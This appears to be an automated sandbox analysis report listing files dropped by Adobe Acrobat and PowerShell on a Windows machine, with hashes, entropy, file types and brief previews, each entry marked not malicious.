                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):328
                                                                      Entropy (8bit):3.2346401979075696
                                                                      Encrypted:false
                                                                      SSDEEP:6:kK/Pi9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:XlDImsLNkPlE99SNxAhUe/3
                                                                      MD5:5719806268D8B876E3B57EABA98B30D3
                                                                      SHA1:840F16EA128B7F1D30455572C6DDF9B0E10CA3B6
                                                                      SHA-256:AF0947280DDE33E20FED3432452C913C7D7D5BE9BF3B5635411977FC7A5A3A27
                                                                      SHA-512:9F871F6A1C4CA6C6B9BB20871F85CC1657B0630ED145F1F105CEE031F494050937EEB4F83C3A7D8E74D95A44C81D262CB4E59C858528A939D3F4D07EDC72620E
                                                                      Malicious:false
                                                                      Preview:p...... ..........`.>...(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7180

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):185099
                                                                      Entropy (8bit):5.182478651346149
                                                                      Encrypted:false
                                                                      SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                      MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                      SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                      SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                      SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):185099
                                                                      Entropy (8bit):5.182478651346149
                                                                      Encrypted:false
                                                                      SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                      MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                      SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                      SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                      SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4
                                                                      Entropy (8bit):0.8112781244591328
                                                                      Encrypted:false
                                                                      SSDEEP:3:e:e
                                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                      Malicious:false
                                                                      Preview:....

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):2145
                                                                      Entropy (8bit):5.0701952346578505
                                                                      Encrypted:false
                                                                      SSDEEP:24:YFud/Y3QJGm27XHZ2LSCt7aZna0TNpnayGZmmuBJvbZW4xCZqu20Z+nZO8ZMCCD/:Y5AwmWXZYEtoitbRCwu20wD+JliWxao
                                                                      MD5:19332271EF267D6062660175B419E3D0
                                                                      SHA1:030EAAD7879E86F963E72E2BE19D23C32700BB0B
                                                                      SHA-256:FF6896335F2555FDC51D6417D9923F67F531DFCBB86AB0F5E36B316BB96476FB
                                                                      SHA-512:C9D4DAFEDA9B8518BA728DE1C2E5EF2C77F8CFDE2E838D76028F1EDE0117526F50CBF9778BF8DD75D0BE1AA4061DA91D8F0FF9D507B12AA6418EE35F400081DC
                                                                      Malicious:false
                                                                      Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1727703676000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"d550de899f04b5f1cb01c3a7438d5d96","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696428962000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"cfa45c7829b86b94abc8cd788add6752","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696428962000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"2dd86d6e5f99203c47dd099f6b5e82b8","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696428955000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"3ef850c86adcfefa30feaf6c5c1404b1","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1696426848000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"955b63af1bb125ce44faeb9a35adb91d","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696426848000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg"

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                      Category:dropped
                                                                      Size (bytes):12288
                                                                      Entropy (8bit):0.993947822605474
                                                                      Encrypted:false
                                                                      SSDEEP:24:TLKufx/XYKQvGJF7ursB1RZKHs/DVf4OpUfuVJLueveuOKOF:TGufl2GL7msvgOVf4cUfuzLuSrOKW
                                                                      MD5:5C9DB498269693EB82B446AA88967336
                                                                      SHA1:6FD378383CAAE18F7089C4420CBBB0670F2A1D5A
                                                                      SHA-256:06D261ADF676B6606050651A2390FCC0657E0FE942BEF9D9E599E60CE6BF4FFE
                                                                      SHA-512:2CF42452E921557D9D010EE9938497BD68066E98C7F4107C6FBE907B31CD99B29B6E2A34A85F2606921047306997AB451E2EF61C0D35DB9C501E70B61CA27DD5
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite Rollback Journal
                                                                      Category:dropped
                                                                      Size (bytes):8720
                                                                      Entropy (8bit):1.3542545377908821
                                                                      Encrypted:false
                                                                      SSDEEP:24:7+tJ61RZKHs/Ds/SpsOpUfuVJLueveuOKOqqLhx/XYKQvGJF7ursh:7MUgOVpscUfuzLuSrOKfqFl2GL7msh
                                                                      MD5:A90EF5C9045D83E1829343557FA55A44
                                                                      SHA1:A1F4B82B9594B5D3F4234F71040D8BDBE1FE64C9
                                                                      SHA-256:8D3FE153DD3936EF9E4320E7777D2C2E0976BB171B6A6C448351C8E9C4D165E7
                                                                      SHA-512:CE08C5C7D66D9E19385632549AA9DF9F5DC6ADFBA97943E0FB2A159D2DA2B3C9F094AC5A88BFDF0235E5934920FFA4E140E2428C14005203C99B8B2C57423699
                                                                      Malicious:false
                                                                      Preview:.... .c......\./......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#...z.>.....}.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):9434
                                                                      Entropy (8bit):4.928515784730612
                                                                      Encrypted:false
                                                                      SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                      MD5:D3594118838EF8580975DDA877E44DEB
                                                                      SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                      SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                      SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                      Malicious:false
                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Preview:@...e...........................................................

                                                                      C:\Users\user\AppData\Local\Temp\MSI46ff5.LOG

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):246
                                                                      Entropy (8bit):3.5177502348333967
                                                                      Encrypted:false
                                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K87eTlH:Qw946cPbiOxDlbYnuRKIg9
                                                                      MD5:DE8A7A65D6943CD1E3804D47B7DCABAC
                                                                      SHA1:A7AD9CF42504F5126E523C8205AB6CD4E12604F7
                                                                      SHA-256:96C0A18492CAF5283D11456E03321F54192FBC27418422C0EA4EEB434C11C120
                                                                      SHA-512:1C1F03A73BA1C6234DF4CB96FC912C1BCCAA73DEAF5B58950D5D07030D51F632ADCB9012CB5D934810DF1A2D952D45EC0C1445504441F154B307CDA7053E1AD6
                                                                      Malicious:false
                                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .3.0./.0.9./.2.0.2.4. . .0.9.:.4.1.:.2.1. .=.=.=.....

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehlaueuw.yqf.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqkvfyiw.kd2.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzsgmhdk.jho.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onro1u3v.pdn.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uq2zlf43.1ne.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdwiwnyt.t1q.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9x48zfd_4niua0_5jg.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                                                      Category:dropped
                                                                      Size (bytes):144514
                                                                      Entropy (8bit):7.992637131260696
                                                                      Encrypted:true
                                                                      SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                                                      MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                                                      SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                                                      SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                                                      SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                                                      Malicious:false
                                                                      Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-09-30 09-41-15-662.log

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with very long lines (393)
                                                                      Category:dropped
                                                                      Size (bytes):16525
                                                                      Entropy (8bit):5.376360055978702
                                                                      Encrypted:false
                                                                      SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                      MD5:1336667A75083BF81E2632FABAA88B67
                                                                      SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                      SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                      SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                      Malicious:false
                                                                      Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):15114
                                                                      Entropy (8bit):5.362832819196059
                                                                      Encrypted:false
                                                                      SSDEEP:384:fTHWvrqyitMCTykqboldv1SMk/ICQcopoTjkaGkVuYgtjITacFAicRclwF7tCZBA:MRO
                                                                      MD5:B49F37DC58215199E0F52BD867E32E58
                                                                      SHA1:546FB58C685730D4B2D91A6842A4D96CF1716771
                                                                      SHA-256:E14B6DF2B8D784EE9D534FA2AB62A2B0C524A3D47A3C829AD21B153376F70C81
                                                                      SHA-512:AF765358E5FC755C3B361556A6A9A15DD39C3A6B48C3646F1BB13B661F0742133EB14D629B2F83D74B97A23C841F8A34827A7D8CC2E6F7A6B05F202D389A7853
                                                                      Malicious:false
                                                                      Preview:SessionID=c578da12-005e-4b08-b51a-05aa84f8cd7f.1727703675693 Timestamp=2024-09-30T09:41:15:693-0400 ThreadID=7488 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=c578da12-005e-4b08-b51a-05aa84f8cd7f.1727703675693 Timestamp=2024-09-30T09:41:15:697-0400 ThreadID=7488 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=c578da12-005e-4b08-b51a-05aa84f8cd7f.1727703675693 Timestamp=2024-09-30T09:41:15:697-0400 ThreadID=7488 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=c578da12-005e-4b08-b51a-05aa84f8cd7f.1727703675693 Timestamp=2024-09-30T09:41:15:697-0400 ThreadID=7488 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=c578da12-005e-4b08-b51a-05aa84f8cd7f.1727703675693 Timestamp=2024-09-30T09:41:15:697-0400 ThreadID=7488 Component=ngl-lib_NglAppLib Description="SetConf

                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):29752
                                                                      Entropy (8bit):5.402029690120667
                                                                      Encrypted:false
                                                                      SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGb1:5
                                                                      MD5:C39D1EC004F7D30D7C76A5ECFC7B57BB
                                                                      SHA1:A069B5DC2893D8F401F50B72173DA07603CA9C15
                                                                      SHA-256:2A8B4772DD0AD8CD50C524681E97A1F75A058BCE66E561C7217A397C0D95D9E4
                                                                      SHA-512:6A7E673B8E29B6B5EF75582DC7DF45B4998DD3A2B21716F8A345C3F8713E0440468E10F47BBBCE9C56720B91D6539D6DBDAABE97CDD63C6D03EF275541EAE662
                                                                      Malicious:false
